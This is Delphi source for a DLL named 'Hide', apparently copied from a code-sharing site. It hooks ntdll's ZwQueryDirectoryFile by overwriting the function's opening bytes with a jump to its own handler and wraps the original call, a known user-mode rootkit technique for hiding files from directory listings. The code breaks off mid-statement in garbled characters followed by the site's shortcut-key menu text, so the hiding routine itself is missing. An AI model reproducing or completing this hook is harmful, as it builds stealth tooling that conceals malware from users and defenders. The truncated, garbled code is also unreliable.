📄 hide.dpr
字号:
library Hide;
uses
Windows,
Native,Dialogs,SysUtils;
type
OldCode = packed record
One: dword;
two: word;
end;
type
FILE_DIRECTORY_INFORMATION = packed record
NextEntryOffset: ULONG;
Unknown: ULONG;
CreationTime,
LastAccessTime,
LastWriteTime,
ChangeTime,
EndOfFile,
AllocationSize: int64;
FileAttributes: ULONG;
FileNameLength: ULONG;
FileName: PWideChar;
end;
PFILE_DIRECTORY_INFORMATION=^FILE_DIRECTORY_INFORMATION;
type
FILE_FULL_DIRECTORY_INFORMATION = packed record
NextEntryOffset: ULONG;
Unknown: ULONG;
CreationTime,
LastAccessTime,
LastWriteTime,
ChangeTime,
EndOfFile,
AllocationSize: int64;
FileAttributes: ULONG;
FileNameLength: ULONG;
EaInformationLength: ULONG;
FileName: PWideChar;
end;
type
FILE_BOTH_DIRECTORY_INFORMATION = packed record
NextEntryOffset: ULONG;
Unknown: ULONG;
CreationTime,
LastAccessTime,
LastWriteTime,
ChangeTime,
EndOfFile,
AllocationSize: int64;
FileAttributes: ULONG;
FileNameLength: ULONG;
EaInformationLength: ULONG;
AlternateNameLength: ULONG;
AlternateName:array [0..11]of WideChar;
FileName: PWideChar;
end;
PFILE_BOTH_DIRECTORY_INFORMATION=^FILE_BOTH_DIRECTORY_INFORMATION;
type
FILE_NAMES_INFORMATION = packed record
NextEntryOffset: ULONG;
Unknown: ULONG;
FileNameLength: ULONG;
FileName: PWideChar;
end;
far_jmp = packed record
PuhsOp: byte;
PushArg: pointer;
RetOp: byte;
end;
var
JmpZwq: far_jmp;
OldZwq: OldCode;
PtrZwq: pointer;
Function ZwQueryDirectoryFile(FileHandle: dword;
Event: dword;
ApcRoutine: pointer;
ApcContext: pointer;
IoStatusBlock: pointer;
FileInformation: pointer;
FileInformationLength: dword;
FileInformationClass: dword;
ReturnSingleEntry: bool;
FileName: PUnicodeString;
RestartScan: bool): NTStatus;
stdcall; external 'ntdll.dll';
Function TrueZwQueryDirectoryFile(FileHandle: dword;
Event: dword;
ApcRoutine: pointer;
ApcContext: pointer;
IoStatusBlock: pointer;
FileInformation: pointer;
FileInformationLength: dword;
FileInformationClass: dword;
ReturnSingleEntry: bool;
FileName: PUnicodeString;
RestartScan: bool): NTStatus;
stdcall;
var
Written: dword;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
@OldZwq, SizeOf(OldCode), Written);
Result := ZwQueryDirectoryFile(FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
FileInformationLength,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan);
WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
@JmpZwq, SizeOf(far_jmp), Written);
end;
Function NewZwQueryDirectoryFile(FileHandle: dword;
Event: dword;
ApcRoutine: pointer;
ApcContext: pointer;
IoStatusBlock: pointer;
FileInformation: pointer;
FileInformationLength: dword;
FileInformationClass: dword;
ReturnSingleEntry: bool;
FileName: PUnicodeString;
RestartScan: bool): NTStatus;
stdcall;
var
Info, Prev: PFILE_BOTH_DIRECTORY_INFORMATION;
begin
Result := TrueZwQueryDirectoryFile(FileHandle,
Event,
ApcRoutine,
ApcContext,
IoStatusBlock,
FileInformation,
FileInformationLength,
FileInformationClass,
ReturnSingleEntry,
FileName,
RestartScan);
if (FileInformationClass = 3) and // FILE_BOTH_DIRECTORY_INFORMATION
(Result = STATUS_SUCCESS) then
begin
showmessage('瑶溧 漕⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -